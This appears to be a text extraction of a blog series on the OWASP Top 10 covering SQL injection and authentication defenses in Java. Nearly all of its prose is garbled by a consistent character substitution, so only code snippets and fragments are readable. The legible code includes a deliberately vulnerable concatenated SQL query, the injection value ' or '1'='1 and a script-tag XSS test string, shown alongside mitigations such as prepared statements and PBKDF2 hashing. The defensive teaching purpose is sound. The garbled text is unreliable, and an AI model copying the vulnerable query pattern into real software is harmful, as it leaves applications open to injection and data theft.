Owasp Top 10 by Ippon

,4A0- 1JK 10 Z &IOMJ?
P>ODJI
http://blog.ippon.fr/2013/10/10/owasp-top-10-introduction/
4C@I NO<MODIB < I@R R@= <KKGD><ODJI, OC@ N@>PMDOT MDNFN <M@ N<?GT JAO@I PI?@M@NODH<O@? =T @Q@MTJI@ (?@Q@GJK@MN,
<M>CDO@>ON, &1, H<I<B@MNY).
4@= <KKGD><ODJIN <M@ HJM@ QPGI@M<=G@ OJ <OO<>FN >JHK<M@? OJ NO<I?<GJI@ <KKGD><ODJIN <N OC@T PNP<GGT @SKJN@ <
N@MQD>@ JQ@M < I@ORJMF OJ < KJO@IOD<GGT G<MB@ KJKPG<ODJI JA PN@MN. ,A >JPMN@, OC@ MDNF DN CDBC@M RC@I OC@ KJKPG<ODJI
DN IJO >G@<MGT D?@IODAD@? (R@= NDO@ JI DIO@MI@O) =PO DO @SDNON <GNJ RDOC < >GJN@? GDNO JA FIJRI K@MNJIN (@IOM@KMDN@
<KKGD><ODJI JI DIOM<I@O) =@><PN@ R@ <GR<TN C<Q@ ?<O< @S>C<IB@? =@OR@@I OC@ >GD@IO (=MJRN@M, R@= N@MQD>@ >GD@IO)
<I? OC@ N@MQ@M.
4C@I TJP >CJJN@ OJ DBIJM@ OC@N@ MDNFN, TJPM ?<O< >JMMPKO@? JM NOJG@I. AI? H<T=@ RJMNO, TJPM
>PNOJH@MN >JH@ QD>ODHN JA <OO<>FN =@><PN@ JA TJPM N@MQD>@. 1C@DM N@NNDJI >F@? =T F@M
OC<O RDGG =@ BM<IO@? <GG K@MHDNNDJIN JI OC@DM K@MNJI<G ?<O<.
4C<O <=JPO TJPM M@KPO<ODJI OC@I ? /@H@H=@M OC@ W -0+B<O@ (COOK://@I.RDFDK@?D<.JMB/RDFD/
-G<T0O<ODJI;+@ORJMF;JPO<B@) X ORJ T@<MN <BJY
(COOK://=GJB.DKKJI.AM/RK->JIO@IO/PKGJ<?N/2013/10/800KS-,R<NK;GJBJ.EKB)
,4A0- (COOKN://RRR.JR<NK.JMB/) KMJQD?@N >JM?DIB OJ OC@DM MDNF
M<ODIB H@OCJ?JGJBT <I? KM@Q<G@I>@ NO<ODNOD>N KMJQD?@? =T ?DAA@M@IO JMB<IDU<ODJIN. 4CDG@ OC@ H@OCJ?JGJBT BDQ@N
< OC@JMD><G M<ODIB =<N@? JI < A@R >MDO@MD< GDF@ ?@O@>O<=DGDOT, @<N@ JA @SKGJDO <I? O@>CID><G DHK<>O, OC@ KM@Q<G@I>@
NO<ODNOD>N >C<IB@ OC@ JM?@M RDOC >JI>M@O@ ?<O< AMJH OC@ M@<G RJMG?.
".B. DI OC@ G<NO M@G@<N@ OCDN T@<M, 0/# MDNF R<N HJQ@? ?JRI AMJH M<IF 5 OJ M<IF 8. A>>JM?DIB OJ ,4A0-, W OCDN
DN =@><PN@ 0/# C<N =@@I DI OC@ ,4A0- 1JK 10 AJM 6 T@<MN, <I? JMB<IDU<ODJIN <I? AM<H@RJMF ?@Q@GJK@MN C<Q@
AJ>PN@? JI DO @IJPBC OJ NDBIDAD><IOGT M@?P>@ OC@ IPH=@M JA 0/# QPGI@M<=DGDOD@N DI M@<G RJMG? <KKGD><ODJIN. X8M@A:
,4A0- 1JK 10 2013 - /@G@<N@ +JO@N (COOKN://RRR.JR<NK.JMB/DI?@S.KCK/1JK;10;2013-/@G@<N@;+JO@N):.
%@M@ <M@ OC@ HJNO DHKJMO<IO MDNFN D?@IODAD@? =T ,4A0-.
V A1 &IE@>ODJI (COOK://=GJB.DKKJI.AM/2013/10/11/JR<NK-OJK-10-<1/)
V A2 BMJF@I APOC@IOD><ODJI <I? 0@NNDJI *<I<B@H@IO (COOK://=GJB.DKKJI.AM/2013/10/21/JR<NK-OJK-10-<2/)
V A3 MJNN-0DO@ 0>MDKODIB (500) (COOK://=GJB.DKKJI.AM/2013/10/28/JR<NK-OJK-10-<3/)
V A4 &IN@>PM@ !DM@>O ,=E@>O /@A@M@I>@N (COOK://=GJB.DKKJI.AM/2013/11/04/JR<NK-OJK-10-<4/)
V A5 0@>PMDOT *DN>JIADBPM<ODJI (COOK://=GJB.DKKJI.AM/2013/11/14/JR<NK-OJK-10-<5/)
V A6 0@INDODQ@ !<O< "SKJNPM@ (COOK://=GJB.DKKJI.AM/2013/11/18/JR<NK-OJK-10-<6/)
V A7 *DNNDIB #PI>ODJI )@Q@G A>>@NN JIOMJG (COOK://=GJB.DKKJI.AM/2013/12/09/JR<NK-OJK-10-<7/)
V A8 MJNN-0DO@ /@LP@NO #JMB@MT (0/#) (COOK://=GJB.DKKJI.AM/2014/01/14/JR<NK-OJK-10-<8/)
V A9 2NDIB JHKJI@ION RDOC (IJRI 3PGI@M<=DGDOD@N (COOK://=GJB.DKKJI.AM/2014/01/28/JR<NK-OJK-10-<9/)
V A10 2IQ<GD?<O@? /@?DM@>ON <I? #JMR<M?N (COOK://=GJB.DKKJI.AM/2014/01/29/JR<NK-OJK-10-<10/)
AGOCJPBC ,4A0- BDQ@N Q@MT DIO@M@NODIB <?QD>@N OJ KM@Q@IO OC@N@ MDNFN, OC@N@ <M@ JIGT B@I@M<GDOD@N. &A TJP R<IO OJ
KMJO@>O TJPM <KKGD><ODJI <B<DINO OC@N@ MDNFN, TJP RDGG I@@? OJ ADI? =T TJPMN@GA OC@ <KKMJKMD<O@ HDODB<ODJIN ?@K@I?DIB
JI TJPM @IQDMJIH@IO (,0, KMJBM<HDIB G<IBP<B@, <KKGD><ODJI N@MQ@M, ?<O<=<N@Y).
&I HT I@SO 10 <MOD>G@N (1 <MOD>G@ K@M MDNF), & RDGG NC<M@ RDOC TJP NJH@ >JI>M@O@ HDODB<ODJIN (AM<H@RJMFN, =@NO
KM<>OD>@N, >J?@ NIDKK@ONY) & C<Q@ KPO DI KG<>@ OJ M@?P>@ OC@N@ MDNFN DI < '<Q<-=<N@? R@= <KKGD><ODJI.
,4A0- 1JK 10 Z A1 &IE@>ODJI
!@N>MDKODJI
1C@ <OO<>F@M N@I?N PIOMPNO@? ?<O< OC<O RDGG =@ DIE@>O@? DI OC@ O<MB@O@? <KKGD><ODJI OJ >C<IB@ DON =@C<QDJPM. 1C@
BJ<G JA OCDN <OO<>F DN PNP<GGT OJ NO@<G ?<O< =PO DO >JMMPKO TJPM ?<O< JM M@NPGO DI ?@ID<G
JA N@MQD>@.
"S<HKG@
&^H >JII@>O@? JI HT =<IF R@=NDO@ <I? & R<IO OJ QD@R DIAJMH<ODJI JI JI@ JA HT <>>JPION. A GDIF DI OC@ K<B@
>JIO<DIN OC@ D=ODIB OC@ &BA+ Q<GP@ DI < LP@MT O@HKG<O@.
String iban = request.getParameter("iban");
String sqlQuery = "select * from ACCOUNTS a where a.IBAN='" + iban + "'";
ResultSet resultSet = connection.executeQuery(sqlQuery);
AI <OO<>F@M >JPG? ><GG OC@ 2/) DI OC@ GDIF RDOC <IT Q<GP@ C@ R<ION DI D=PO@? <I? RDGG M@OPMI
<GG <>>JPION NOJM@? DI OC@ ?<O<=<N@ !
+JO@N
/@H@H=@M DIE@>ODJI <OO<>FN <M@ KJNND=G@ @Q@MTRC@M@ TJP C<Q@ MDKO, 00, %11-
C@<?@MN, 5*) K<MN@MN, 0.), +J0.), 5K<OC, )!A-Y
&I W A3 Z MJNN-0DO@ 0>MDKODIB X <MOD>G@, R@ RDGG N@@ MDKO DIE@>ODJI OJ CDE<>F < N@NNDJI.
,0 DIE@>ODJI DN <GNJ KJNND=G@ PNDIB /PIODH@.B@O/PIODH@().@S@>(Y) H@OCJ?N. AGOCJPBC OC@ OCM@<O DN M@<G, R@=
<KKGD><ODJIN M<M@GT @S@>PO@ ,0 @SO@MI<G <KKGD><ODJIN JI OC@ N@MQ@M.
*DODB<ODJIN
NJPM>@: COOK://SF>?.>JH
4CDO@-GDNO DIKPO Q<GD?<ODJI
1C@ ADMNO KMJO@>ODJI DN OJ FIJR @S<>OGT RC<O TJP @SK@>O <N DIKPO AMJH TJPM PN@MN, NJ TJP >JHH@I?@? R<T DN < RCDO@-GDNO DIKPO Q<GD?<ODJI JI N@MQ@M ND?@. 1C<O H@<IN TJP Q@MDAT <GG OC@
>C<M<>O@MN @IO@M@? =T OC@ PN@M <M@ @SKGD>DOGT <GGJR@?. *JM@JQ@M, OC@ G@IBOC <I? OC@ AJMH<O HPNO =@ Q@MDAD@? RC@I
<KKGD><=G@.
".B. 1C@ &BA+ AJMH<O DN FIJRI OCPN DO >N.JM<>G@.>JH/E<Q<@@/
6/<KD/E<Q<S/Q<GD?<ODJI/K<>F<B@-NPHH<MT.COHG) DA TJPM KM@A@MM@? KM@N@IO<ODJI AM<H@RJMF NPKKJMON DO (@.B. '0# 2,
0KMDIB *3 3, $41 2.5). 6JP >N.JM<>G@.>JH/E<Q<@@/6/<KD/E<Q<S/A<>@N/Q<GD?<OJM/K<>F<B@-NPHH<MT.COHG)) JM OCDM?-
K<MOD@N GDF@ "0A-& (COOKN://RRR.JR<NK.JMB/DI?@S.KCK/<O@BJMT:,4A0-;"IO@MKMDN@;0@>PMDOT;A-&).
1C@ B@@ AM<H@RJMF OJ Q<GD?<O@ (<B<DI) TJPM
?<O< =@AJM@ K@MNDNODIB DO DI TJPM ?<O<=<N@.
<IJID><GDU<ODJI (14+)
0JH@ODH@N, @IO@M@? ?<O< >>@KO<=G@ AJMH<ON. ".B. < KCJI@ IPH=@M >@N, ?<NC@N, ?JON =@OR@@I BMJPKN JA ?DBDON <I? KM@ADS =@OR@@I K<M@IOC@N@N. A K<OC > GDIF. A >C<M<>O@M DI J?@?.
<IJID><GDU<ODJI >JINDNON DI OM<INAJMHDIB @IO@M@? ?<O< OJ DON NDHKG@NO ADS@? AJMH<O. #JM < KCJI@ IPH=@M, DO
>JINDNON DI M@HJQDIB <GG AJMH<OODIB >C<M<>O@MN OJ F@@K JIGT ?DBDON. A ><IJID><GDU@? K<OC DN OC@ <=NJGPO@ K<OC. ,I>@
><IJID><GDU@?, %1*) ?<O< ?J@NIÔ >JIO<DI @I>J?@? >C<M<>O@MN.
4CDG@ ><IJID><GDU<ODJI DN JKODJI<G, DO DN M@>JHH@I?@? RC@I NK@>D<G >C<M<>O@MN (GDF@ &, 9, %Y) <M@ <GGJR@? DI DIKPO
?<O<.
&A TJP R<IO OJ ><IJID><GDU@ TJPM DIKPO ?<O<, DO HPNO =@ ?JI@ =@AJM@ DIKPO Q<GD?<ODJI JOC@MRDN@ F@M >JPG?
K<NN OC@ Q<GD?<ODJI NO@K =T @I>J?DIB NJH@ >C<M<>O@MN RDOC <GGJR@? >C<M<>O@MN.
".B. &A & <I? ; <M@ <GGJR@? RCDG@ < <I? > <M@ IJO, F@M >O < <I? > NDHKGT =T M@KG<>DIB OC@N@
>C<M<>O@MN RDOC OC@DM @I>J?@? Q<GP@N < <I? > . &A TJP <KKGT ><IJID><GDU<ODJI <AO@M DIKPO Q<GD?<ODJI, OC@
DIKPO ?<O< RDGG =@ >JIND?@M@? <N Q<GD?, ><IJID><GDU@? OC@I ?DNKG<T@? <I? DIO@MKM@O@? =T OC@ =MJRN@M <N <IJID><GDU<ODJI AJM <GHJNO <GG DIO@MKM@O@MN (%1*), '<Q<N>MDKO, 2/), ,0
NK@>DAD>, ?<O<=<N@NY)
Encoder encoder = ESAPI.encoder();
String inputHTML = "<script>alert(\"hello\");</script>";
String normalizedInputHTML = encoder.canonicalize(inputHTML);
System.out.println(normalizedInputHTML); ==> <N>MDKO><G@MO([C@GGJ\);</N>MDKO>
String inputURL = "%3Cscript%3Ealert(\"hello\");%3C/script%3E";
String normalizedInputURL = encoder.canonicalize(inputURL);
System.out.println(normalizedInputURL); ==> <N>MDKO><G@MO([C@GGJ\);</N>MDKO>
String potentialIntrusion = "%3Cscript>alert%28%22hello&#34%29%3B%3C%2Fscript%3E";
String normalizedPotentialIntrusion = encoder.canonicalize(potentialIntrusion); ==> OCMJRN
&IOMPNDJI"S>@KODJI =@><PN@ *DS@? @I>J?DIB R<N ?@O@>O@?
1DK: 1J KMJO@>O TJPM <KKGD><ODJI <B<DINO 2ID>J?@-=<N@? DIE@>ODJI <OO<>FN, ?JIÔ AJMB@O OJ N@O OC@ <KKMJKMD<O@
G<IBP<B@ GJ><G@ <I? >C<M<>O@M N@O.
-M@K<M@? NO<O@H@IO (0.))
A KM@K<M@? NO<O@H@IO DN < KM@>JHKDG@? 0.) NO<O@H@IO. B@TJI? OC@ K@MAJMH@ <?Q<IO<B@, KM@K<M@? NO<O@H@ION
DN CDBCGT M@>JHH@I?@? OJ KM@Q@IO 0.) DIE@>ODJI <OO<>FN. &INO@<? JA >M@<ODIB ODIB M@<O@ < NO<OD> NOMDIB DI RCD>C TJP ?@>G<M@ =DI? Q<MD<=G@N.
String iban = request.getParameter("iban");
// iban should be canonicalized then validated before continuing
String sqlQuery = "select * from ACCOUNTS a where a.IBAN=?";
PreparedStatement stmt = connection.prepareStatement(sqlQuery);
stmt.setString(1, iban);
ResultSet resultSet = stmt.executeQuery();
&I OCDN ><N@, DA OC@ <OO<>F@M M@KG<>@N OC@ &BA+ Q<GP@ RDOC ' or '1'='1 , OC@ @S@>PO@? LP@MT RDGG =@ @LPDQ<G@IO OJ
select * from ACCOUNTS a where a.IBAN=''' or ''1''=''1' . ,=QDJPNGT, OCDN LP@MT RDGG M@OPMI IJ M@NPGO.
,A >JPMN@, TJP C<Q@ <KKGD@? OC@ HDODB<ODJIN DI OC@ KM@QDJPN N@>ODJIN, TJP NCJPG? C<Q@ M@E@>O@? OCDN DIQ<GD? &BA+
=@AJM@ TJP OMT OJ @S@>PO@ OC@ LP@MT <N DO ?J@N IJO H<O>C OC@ &BA+ K<OO@MI.
AI <>>@KO<=G@ <GO@MI<ODQ@ OJ OC@ KM@K<M@? NO<O@H@IO DN < NOJM@? KMJ>@?PM@. 1C@ HJNO DHKJMO<IO OCDIB OJ
PI?@MNO<I? DN OJ PN@ =DI? Q<MD<=G@ DINO@<? JA NOMDIB >JI><O@I<ODJI OJ >M@<O@ TJPM LP@MT.
1DK: 4DOC '-A (COOK://?J>N.JM<>G@.>JH/E<Q<@@/6/<KD/E<Q<S/K@MNDNO@I>@/K<>F<B@-NPHH<MT.COHG), TJP >M@<O@
LP@MD@N (JM I<H@? LP@MD@N) RDOC =DI? Q<MD<=G@N OJ ?@>G<M@ TJPM 0.) NO<O@H@ION. B@CDI? OC@ N>@I@, TJPM KM@A@MM@?
'-A DHKG@H@IO<ODJI (%D=@MI<O@, ,K@I'-AY) RDGG >M@<O@ < KM@K<M@? NO<O@H@IO AJM TJP.
4DOC NDHKG@ LP@MD@N, TJP >M@<O@ OC@ LP@MT ?DM@>OGT DI TJPM !A, >G<NN:
public class AccountDaoImpl {
public Lisy<Account> findAll() {

TypedQuery<Account> query = em.createQuery("SELECT a FROM Account a", Account.class);
return query.getResultList();
}
public Account findByIban(String iban) {
TypedQuery<Account> query = em.createQuery("SELECT a FROM Account a WHERE a.iban =
:iban", Account.class);
// we assume the iban is already canonicalized and validated
query.setParameter("iban", iban);
return query.getSingleResult();
}
}
4DOC I<H@? LP@MD@N, TJP ?@>G<M@ TJPM LP@MD@N JI TJPM @IODOT >G<NN:
@Entity
@NamedQueries({
@NamedQuery(name="Account.findAll", query="SELECT a FROM Account a"),
@NamedQuery(name="Account.findByIban", query="SELECT a FROM Account a WHERE a.iban =
:iban"),
})
public class Account {
}
1C@I TJP PN@ OC@H DI TJPM !A, >G<NN:
public class AccountDaoImpl {
public Lisy<Account> findAll() {

TypedQuery<Account> query = em.createNamedQuery("Account.findAll", Account.class);
return query.getResultList();
}
public Account findByIban(String iban) {
TypedQuery<Account> query = em.createNamedQuery("Account.findByIban", Account.class);
// we assume the iban is already canonicalized and validated
query.setParameter("iban", iban);
return query.getSingleResult();
}
}
-@MNJII<GT, & M@>JHH@I? I<H@? LP@MD@N RC@I KJNND=G@. 4DOC LP@MD@N >M@<O@? <O MPIODH@, TJP >ODJI DA TJP PN@ NOMDIB >JI><O@I<ODJI. 4DOC I<H@? LP@MD@N, OC@ LP@MT DN KM@K<M@? <O
DIDOD<GDU<ODJI ODH@. AO MPIODH@, TJP >PO@ OC@ LP@MT.
!@N>MDKODJI
1C@ <OO<>F@M NO@<GN CDN QD>ODH^N >M@?@IOD<GN JM <IT DIAJMH<ODJI OC<O RDGG C@GK CDH DHK@MNJI<ODIB OC@ QD>ODH JI TJPM
<KKGD><ODJI.
"S<HKG@N
GD@IO <OO<>F
1J <POC@IOD><O@ JI HT =<IF R@=NDO@, HT K<NNRJM? DN Q@MT NDHKG@ OJ M@H@H=@M, DO^N HT =DMOC?<O@. BPO & R<IO OJ
>C<IB@ DO RDOC HT RDA@^N =DMOC?<O@ <I? & M@>@DQ@ OC@ AJGGJRDIB @H<DG AMJH HT =<IF :
!@<M -CDGDKK@,
6JPM D?@IODAD@M DN : KCDGDKK@
6JPM I@R K<NNRJM? DN : 01021975
/@B<M?N,
6JPM B<IF.
AIT <OO<>F@M >JPG? @<NDGT BP@NN TJPM K<NNRJM?. &A C@ FIJRN TJPM =<IF R@=NDO@ M@LPDM@N < 8-?DBDON K<NNRJM?, RDOC
NJ>D<G @IBDI@@MDIB, DO DN @<NT OJ C<Q@ <GG TJPM A<HDGT H@H=@MN^ =DMOC?<O@N (K<M@ION, NKJPN@, >CDG?M@IY).
AI? @Q@I DA TJPM K<NNRJM? R<N IJO @<NT OJ BP@NN, @? <OO<>F@M >JPG? <GNJ DIO@M>@KO TJPM @H<DG <I?
B@O TJPM D?@IODAD@M <I? TJPM K<NNRJM?.
0@MQ@M <OO<>F
AI @SK@MD@I>@? <OO<>F@M C<N ?JRIGJ<?@? OC@ GJBDI <I? K<NNRJM? JA <GG >PNOJH@MN JA TJPM =<IF. %JK@APGGT, <GG ?<O<
<M@ DI >G@<M O@SO, NJ OC@ <OO<>F@M >M@?@IOD<GN =@AJM@ OC@ <?HDIDNOM<OJM >PNOJH@MNY
*DODB<ODJIN
"?P><O@ OC@ PN@MN JA TJPM <KKGD><ODJI
1CDN <OO<>F >JHKPO@M N>D@I>@N) =@><PN@ <GG PN@MN <M@ IJO
<R<M@ JA OC@ MDNFN. & C<Q@ <GM@<?T N@@I !BA CD?DIB OC@ ?<O<=<N@ >M@?@IOD<GN JI < KJNO-DO PI?@M OC@DM F@T=J<M? !
2N@MN NCJPG? :
V F@@K OC@DM >M@?@IOD<GN N<A@
V NCJPG? IJO PN@ @<NT OJ BP@NN K<NNRJM?N (0000, 123<=>, K<NNRJM? JM @Q@I -@NNR0M?)
V NCJPG? IJO PN@ K@MNJI<G DIAJMH<ODJI (I<H@N, KCJI@ IPH=@MN, =DMOC ?<O@) DI OC@DM K<NNRJM?N
V IJO PN@ OC@ N<H@ K<NNRJM? JI ?DAA@M@IO <KKGD><ODJI. &A JI@ JA OC@N@ <KKGD><ODJIN DN <OO<>F@?, <GG TJPM JOC@M
<>>JPION <M@ KJO@IOD<GGT >JHKMJHDN@?.
V =@ ><M@APG RC@I PNDIB < KP=GD> RDAD I@ORJMF. AI <OO<>F@M >@KO <GG >JHHPID><ODJI
(@I>MTKO@? JM IJO).
OWASP Top 10 A2 Broken Authentication and Session
Management
AI? JA >JPMN@, =@ ><M@APG RDOC [NJ>D<G @IBDI@@MDIB\. 0J>D<G @IBDI@@MDIB >JINDNON DI H<IDKPG<ODIB < QD>ODH OJ J=O<DI
>JIAD?@IOD<G JM K@MNJI<G DIAJMH<ODJI. &O DN PNP<GGT < BJJ? H@OCJ? AJM @S<HKG@ OJ B@O OC@ K@MNJI<G KCJI@ IPH=@M JM
<??M@NN JA < 3&- (< ",, < %/ ?DM@>OJMY). BPO DO >C DN
JAO@I < LP@NODJI KMJKJN@? =T HJNO JA OC@ R@= NDO@N OJ M@>JQ@M TJPM GJNO K<NNRJM?.
(COOK://=GJB.DKKJI.AM/RK->JIO@IO/PKGJ<?N/2013/10/N@>PMDOT;LP@NODJI.KIB)
&?@IODOT <I? A>>@NN *<I<B@H@IO (&A*)
6JP >M<O>C JM PN@ ODJIN ?@K@I?DIB JI CJR N@INDODQ@ OC@
DIAJMH<ODJI TJP I@@? OJ KMJO@>O <M@.
-<NNRJM? NOM@IBOC
1C@ K<NNRJM? HPNO =@ NOMJIB <I? ?DAAD>PGO OJ BP@NN.
2NP<GGT, < NOMJIB K<NNRJM? NCJPG? C<Q@ <O G@<NO 8 >C<M<>O@MN. 1C@M@ <M@ 4 N@ON JA >C<M<>O@MN : ?DBDON, PKK@M><N@
G@OO@MN, GJR@M><N@ G@OO@MN <I? NK@>D<G >C<M<>O@MN. 1C@ >C<M<>O@MN JA OC@ K<NNRJM? NCJPG? =@ AMJH <O G@<NO 3 JA OC@
4 N@ON JA >C<M<>O@MN.
-<NNRJM? B@I@M<ODJI <I? ?DNOMD=PODJI
*PGOD-A<>OJM <POC@IOD><ODJI
#JM PN@MN OC<O C<Q@ <>>@NN OJ N@INDODQ@ DIAJMH<ODJI <I? JK@M<ODJIN, TJP NCJPG? M@LPDM@ <O G@<NO 2 >M@?@IOD<GN JA
?DAA@M@IO OTK@N. 1C@M@ <M@ 3 OTK@N JA >M@?@IOD<GN :
V W 0JH@OCDIB & (IJR X GDF@ < K<NNRJM?,
V W 0JH@OCDIB & ,RI X GDF@ M@?@IOD<GN (K<NNRJM?, >@MODAD><O@Y) HPNO @SKDM@ M@BPG<MGT. 1C@ AM@LP@I>T RDGG ?@K@I? JI RC<O OC@ JRI@M JA
OC@N@ >M@?@IOD<GN ><ODJI.
4C@I < K<NNRJM? @SKDM@N, OC@ PN@M HPNO >C<IB@ DO <O GJBDI ODH@.
-<NNRJM? M@>JQ@MT
&A OC@ PN@M AJMB@O DON K<NNRJM?, OC@ <KKGD><ODJI HPNO B@I@M<O@ < O@HKJM<MT K<NNRJM?, Q<GD? AJM < >JPKG@ JA CJPMN
H<SDHPH. 1C@ O@HKJM<MT K<NNRJM? DN N@IO OJ OC@ PN@M =T @H<DG, @Q@IOP<GGT -$- @I>MTKO@?. 1C@I OC@ PN@M HPNO
>C<IB@ DO <O GJBDI ODH@.
A>>JPIO GJ>FDIB
1J KM@Q@IO =MPO@ AJM>@ <OO<>FN, OC@ <>>JPIO HPNO =@ GJ>F@? <AO@M OJJ H<IT (3) A<DG@? GJBDI <OO@HKON.
2NP<GGT, DO DN <GNJ KM@A@M<=G@ OJ DI<>ODQ<O@ OC@ <>>JPIO RC@I DO DN IJO PN@? AJM < GJIB ODH@ (< >JPKG@ JA HJIOCN).
APOC@IOD><ODJI >M@?@IOD<GN KMJO@>ODJI
(COOK://=GJB.DKKJI.AM/RK->JIO@IO/PKGJ<?N/2013/10/N@>PMDOT.KIB)
1C@ K<NNRJM?N NOJM@? DI TJPM ?<O<=<N@ HPNO =@ @I>MTKO@? JM C<NC@?. &A F@M >PGO AJM CDH (=PO IJO DHKJND=G@) OJ M@OMD@Q@ OC@ K<NNRJM?N DI >G@<M O@SO.
1RJ ?DAA@M@IO JKODJIN: C<NC JM @I>MTKODJI.
%<NC (JI@-R<T @I>MTKODJI)
&A TJP ?JIÔ I@@? OJ M@OMD@Q@ OC@ M@<G K<NNRJM? DI >G@<M O@SO, OC@I C<NC DN KM@A@M<=G@. &O DN GDF@ < JI@-R<T @I>MTKODJI.
,I>@ C<NC@?, DO DN OC@JM@OD><GGT DHKJNND=G@ OJ M@OMD@Q@ OC@ JMDBDI<G Q<GP@. ,A >JPMN@, DO DN NODGG KJNND=G@ OJ W BP@NN X
OC@ K<NNRJM?. &A TJPM =<IF C<? NOJM@? OC@ K<NNRJM? C<NC Q<GP@, OC@ <OO<>F@M OC<O C<Q@ ?JRIGJ<?@? OC@ GDNO JA
>M@?@IOD<GN RJPG? C<Q@ OJ <KKGT OC@ C<NC <GBJMDOCH JI < GDNO JA AM@LP@IOGT PN@? K<NNRJM?N <I? Q@MDAT DA OC@ M@NPGODIB
C<NC Q<GP@ @SDNON DI OC@ NOJG@I GDNO.
+JO@ OC<O N@Q@M<G K<NNRJM?N >JPG? BDQ@ OC@ N<H@ C<NC Q<GP@. &A OC@ <OO<>F@M ADI?N < H<O>CDIB C<NC Q<GP@, C@ >ODJIN @SDNO. 1C@ HJNO PN@? <M@ *!5 <I? 0%A-1. *!5 DN FIJRI OJ C<Q@ < CDBC MDNF JA >JGGDNDJI
(N@Q@M<G H@NN<B@N BDQ@ OC@ N<H@ C<NC Q<GP@) NJ DO DN IJO M@>JHH@I?@?. 0%A-1 DN <>>@KO<=G@ JI < NDHKG@ R@=NDO@
RDOC IJ N@INDODQ@ ?<O< OJ KMJO@>O =PO 0%A-2 DN KM@A@M<=G@ RC@I N@>PMDOT M@<GGT H<OO@MN.
BPO M@H@H=@M < C<NC Q<GP@ DN Q@MT A<NO OJ >JHKPO@ (G@NN OCJHKPO@M). &H<BDI@ CJR H<IT
K<NNRJM?N OC@ <OO<>F@M >JI? OJ ADI? H<O>CDIB C<NC Q<GP@N DI OC@ NOJG@I GDNO RDOC < M@>@IO >JHKPO@M
JM < N@O JA [UJH=D@\ >JHKPO@MNY
-<NNRJM?-=<N@? F@T ?@MDQ<ODJI API>ODJI
#JM < =@OO@M KMJO@>ODJI, & M@>JHH@I? PNDIB < K<NNRJM?-=<N@? F@T ?@MDQ<ODJI API>ODJI. 1C@ BJ<G DN NDHKG@ : H<F@
DO GJIB@M AJM OC@ <OO<>F@M OJ ?@>MTKO OC@ K<NNRJM?N DI OC@ ?<O<=<N@.
1C@ HJNO PN@? DN -B(!#2 (NDHKGT -<NNRJM?-B<N@? (@T !@MDQ<ODJI #PI>ODJI 2) <.F.< -(0#5.
1C@ KMDI>DKG@ ? 6JP B@I@M<O@ < N<GO (D.@ < M<I?JH Q<GP@) AJM @<>C K<NNRJM?. 1C@ API>ODJI RDGG <KKGT <
KN@P?JM<I?JH API>ODJI JI OC@ K<NNRJM? OJ KMJO@>O <GJIB RDOC OC@ B@I@M<O@ N<GO. 1C@I DO RDGG <KKGT <B<DI OC@ N<H@
KN@P?JM<I?JH API>ODJI JI OC@ N<H@ K<NNRJM? <GJIB RDOC, OCDN ODH@, OC@ M@NPGO J=O<DI@? <O OC@ KM@QDJPN NO@K. AI?
NJ JIY
,=QDJPNGT, TJP NOJM@ OC@ M@NPGODIB C<NC Q<GP@ <I? OC@ DIDOD<G N<GO DI OC@ ?<O<=<N@.
4C@I OC@ PN@M @IO@MN CDN K<NNRJM?, TJP <KKGT OC@ N<H@ -B(!#2 <GBJMDOCH OJ OC@ KMJQD?@? K<NNRJM?, PNDIB
OC@ NOJM@? N<GO <I? OC@ <KKMJKMD<O@ IPH=@M JA DO@M<ODJIN <I? OC@I TJP >JHK<M@ OC@ M@NPGODIB C<NC Q<GP@ RDOC OC@
@SK@>O@? Q<GP@.
#JM < NOMJIB KMJO@>ODJI, TJP NCJPG? <KKGT <O G@<NO 10 000 DO@M<ODJIN. !JIÔ RJMMT, DA < NDHKG@ C<NC O<F@N G@NN OCJI?N), =PO AJM OC@ <OO<>F@M, DO RDGG =@ < GJO HJM@ ?DAAD>PGO
=@><PN@ C@ RDGG C<Q@ OJ ADI? ADMNO OC@ IPH=@M JA DO@M<ODJIN (OCDN HPNO =@ < N@>M@O Q<GP@), OC@I <KKGT OCDN W NGJR X
<GBJMDOCH JI @<>C K<NNRJM? JA CDN ?D>ODJI<MT.
0PI'" KMJQD?@N ODJI.
// Generating a 32-bytes salt
SecureRandom random = SecureRandom.getInstance("SHA1PRNG", "SUN");
byte[] salt = random.generateSeed(32);
// Apply PBKDF2 algorithm on the password, with the generated salt and 10000 iterations
SecretKeyFactory f = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1", "SunJCE");
SecretKey key = f.generateSecret(new PBEKeySpec(password, salt, 10000, 256));
byte[] hashedPassword = key.getEncoded()
+JO@: &A TJP I@@? T@O NOMJIB@M KMJO@>ODJI, >C@>F JPO =>MTKO (COOK://RRR.JK@I=N?.JMB/K<K@MN/=>MTKO-K<K@M.KN) JM
N>MTKO (COOK://RRR.O<MNI<K.>JH/N>MTKO/N>MTKO.K?A). 0PI ?J@N IJO NPKKJMO OC@N@ (!#N DI OC@DM N@>PMDOT KMJQD?@MN
=PO TJP >@ DHKG@H@IO<ODJI AJM '<Q< GDF@ EBMTKO (COOK://RRR.HDI?MJO.JMB/KMJE@>ON/EBMTKO/) <I?
RB/N>MTKO (COOKN://BDOCP=.>JH/RB/N>MTKO).
"I>MTKODJI
&I NJH@ M<M@ ><N@N, TJP H<T I@@? OJ M@OMD@Q@ OC@ K<NNRJM? DI >G@<M O@SO. #JM @S<HKG@, DA TJP C<Q@ < K<NNRJM?
M@>JQ@MT KJGD>T OC<O M@LPDM@N OJ N@I? OC@ K<NNRJM? OJ OC@ PN@M <AO@M C@ C<N KMJQD?@? NJH@ N@>M@O <INR@MN. +JO@
OC<O OCDN KJGD>T DN IJO M@>JHH@I?@? (M@A@M OJ HT M@>JHH@I?@? K<NNRJM? M@>JQ@MT KJGD>T <=JQ@).
6JP >CJJN@ NTHH@OMD> JM <NTHH@OMD> @H>MTKODJI ?@K@I?DIB JI TJPM I@@?N.
&A TJPM <KKGD><ODJI @I>MTKON OC@ K<NNRJM? =@AJM@ NOJM<B@ OC@I ?@>MTKON DO RC@I I@@?@?, NTHH@OMD> <GBJMDOCH DN
KM@A@M<=G@. 1C@ N@>M@O F@T DN NOJM@? DI < F@TNOJM@ <>>@NND=G@ JIGT OJ TJPM <KKGD><ODJI.
